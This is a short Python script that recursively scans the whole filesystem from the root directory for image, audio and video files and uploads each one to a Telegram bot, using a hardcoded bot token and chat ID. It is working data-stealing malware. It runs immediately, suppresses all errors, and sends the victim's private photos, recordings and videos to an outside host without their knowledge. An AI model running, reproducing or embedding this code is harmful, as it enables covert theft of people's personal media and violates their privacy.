import os
import requests

BOT_TOKEN = '7526840364:AAEmbY0HvifSAZHEndWZ6VJUgUTQcjcIVNM'
CHAT_ID = '1271397574'

extensions = [
    '.mp3', '.wav', '.flac', '.aac', '.ogg', '.m4a',
    '.mp4', '.mov', '.avi', '.mkv', '.flv', '.wmv', '.webm', '.3gp',
    '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.tiff', '.svg', '.heic', '.webp',
    '.raw', '.cr2', '.nef', '.orf', '.sr2',
]

def send_file(file_path):
    try:
        url = f'https://api.telegram.org/bot{BOT_TOKEN}/sendDocument'
        with open(file_path, 'rb') as f:
            files = {'document': f}
            data = {'chat_id': CHAT_ID}
            requests.post(url, files=files, data=data)
    except:
        pass

def full_scan(base_dir='/'):
    for root, dirs, files in os.walk(base_dir):
        for file in files:
            if any(file.lower().endswith(ext) for ext in extensions):
                path = os.path.join(root, file)
                send_file(path)

# Başlat
full_scan('/')
